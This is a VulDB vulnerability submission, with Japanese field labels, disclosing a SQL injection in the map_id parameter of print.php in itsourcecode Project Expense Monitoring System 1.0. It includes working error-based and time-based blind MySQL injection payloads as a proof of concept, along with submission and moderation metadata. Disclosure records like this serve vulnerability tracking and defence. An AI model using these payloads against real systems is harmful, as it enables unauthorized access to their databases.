| タイトル | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|
| 説明 | Constructing a special SQL statement in the print.php page and passing it in the map_id parameter can lead to a SQL injection vulnerability.
POC:
Parameter: map_id (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: map_id=67' AND GTID_SUBSET(CONCAT(0x7162627a71,(SELECT (ELT(5075=5075,1))),0x716b717671),5075)-- xGVQ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: map_id=67' AND (SELECT 2049 FROM (SELECT(SLEEP(5)))IStZ)-- PtEB |
|---|
| ソース | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-3.md |
|---|
| ユーザー | GUOTINGTING (UID 73614) |
|---|
| 送信 | 2024年08月17日 14:15 (2 年 ago) |
|---|
| モデレーション | 2024年08月19日 16:12 (2 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 275120 [itsourcecode Project Expense Monitoring System 1.0 print.php map_id SQLインジェクション] |
|---|
| ポイント | 20 |
|---|